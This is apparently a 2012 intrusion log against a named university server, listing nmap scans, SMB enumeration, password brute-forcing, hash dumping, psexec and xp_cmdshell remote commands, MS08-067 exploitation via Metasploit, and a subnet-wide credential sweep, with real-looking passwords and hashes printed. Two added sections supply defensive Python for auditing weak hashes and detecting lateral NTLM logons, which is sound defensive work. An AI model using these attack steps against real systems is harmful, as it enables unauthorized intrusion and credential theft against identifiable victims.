Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
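Read from the defender's side, the dump above already tells an auditor three things: pwdump prints NO PASSWORD where the stored hash is the empty-password hash, any LM hash at all means LM storage is still enabled, and an LM hash whose second half is AAD3B435B51404EE (the LM hash of an all-padding half) means the password is seven characters or shorter, which is why test's 123456 looks the way it does. The following password-hygiene audit is an added example, not code from the original post; it parses the smb-pwdump result lines exactly as printed above (copied inline as the sample input) and the empty-hash constants are well-known public values.

```python
import re

# Public constants (not page data): the LM/NT hashes of an empty password.
LM_EMPTY_HALF = "AAD3B435B51404EE"     # LM hash of a 7-byte half that is all padding
LM_EMPTY = LM_EMPTY_HALF * 2
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"

# One result line of nmap's smb-pwdump output: "|   user:rid => LM:NT"
LINE_RE = re.compile(r"^\|_?\s+(?P<user>[^:]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>.+)$")

def normalise(h):
    """pwdump prints 'NO PASSWORD*...' for an empty-password hash; map that to None."""
    h = h.strip()
    return None if h.startswith("NO PASSWORD") else h.upper()

def audit_entry(lm, nt):
    """Weaknesses visible from one account's LM:NT pair, as a list of strings."""
    findings = []
    lm, nt = normalise(lm), normalise(nt)
    if nt is None or nt == NT_EMPTY:
        findings.append("blank password")
    if lm is not None and lm != LM_EMPTY:      # LM stored: <= 14 chars, case-folded, two halves
        findings.append("LM hash stored")
        if lm[16:] == LM_EMPTY_HALF:           # second half is padding only
            findings.append("password is 7 characters or fewer")
    return findings

def audit_pwdump(text):
    """Parse smb-pwdump output; return {user: findings} for accounts with any finding."""
    report = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m and (findings := audit_entry(m["lm"], m["nt"])):
            report[m["user"]] = findings
    return report

# Sample input: the smb-pwdump result lines from the post above, copied verbatim.
SAMPLE = """\
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

if __name__ == "__main__":
    for user, findings in audit_pwdump(SAMPLE).items():
        print(f"{user}: {', '.join(findings)}")
```

The same checks apply to a raw pwdump file (user:rid:LM:NT:::) once the line regex is swapped; the hash constants and the half-hash test do not change.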
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use the MS08-067 vulnerability in msf to exploit the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try the usernames together with the captured hash to log in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~
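The last step, one set of credentials replayed against 192.168.1.1-254, leaves a distinctive trace on the receiving side: the same account logging on over the network with NTLM (Security event 4624, logon type 3) on many hosts from one source address within seconds. The detection below is an added example and not part of the original post; it assumes 4624 records forwarded to a collector as one JSON object per line with the field names shown, and the sample events are constructed.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: Windows Security event 4624 (successful logon) records as a SIEM
# might forward them, one JSON object per line. The field names are this example's own.
SAMPLE_EVENTS = """\
{"time":"2012-02-29T01:02:03","host":"WS-101","id":4624,"user":"administrator","logon_type":3,"auth":"NTLM","src_ip":"192.168.1.50"}
{"time":"2012-02-29T01:02:05","host":"WS-102","id":4624,"user":"administrator","logon_type":3,"auth":"NTLM","src_ip":"192.168.1.50"}
{"time":"2012-02-29T01:02:06","host":"WS-103","id":4624,"user":"alice","logon_type":2,"auth":"Negotiate","src_ip":"-"}
{"time":"2012-02-29T01:02:09","host":"WS-105","id":4624,"user":"Administrator","logon_type":3,"auth":"NTLM","src_ip":"192.168.1.50"}
{"time":"2012-02-29T01:40:00","host":"FS-01","id":4624,"user":"bob","logon_type":3,"auth":"NTLM","src_ip":"192.168.1.77"}
"""

def parse_events(text):
    """One JSON record per line; the timestamp becomes a datetime."""
    events = []
    for line in text.splitlines():
        if line.strip():
            e = json.loads(line)
            e["time"] = datetime.fromisoformat(e["time"])
            events.append(e)
    return events

def detect_lateral_ntlm(events, min_hosts=3, window=timedelta(minutes=5)):
    """Flag (source IP, account) pairs whose NTLM network logons (4624, logon type 3)
    land on at least min_hosts distinct machines inside `window`: a replayed password
    or hash sweeping a subnet shows up as exactly this fan-out."""
    by_pair = defaultdict(list)
    for e in events:
        if e["id"] == 4624 and e["logon_type"] == 3 and e["auth"].upper() == "NTLM":
            by_pair[(e["src_ip"], e["user"].lower())].append((e["time"], e["host"]))
    alerts = []
    for (src, user), hits in by_pair.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):      # slide the window from each logon
            hosts = {h for t, h in hits[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                alerts.append({"src_ip": src, "user": user, "hosts": sorted(hosts),
                               "first_seen": t0.isoformat()})
                break
    return alerts

if __name__ == "__main__":
    for alert in detect_lateral_ntlm(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Tune min_hosts and window to the environment's normal admin activity; the failed attempts that precede each success (event 4625) fit the same grouping if they are fed in as well.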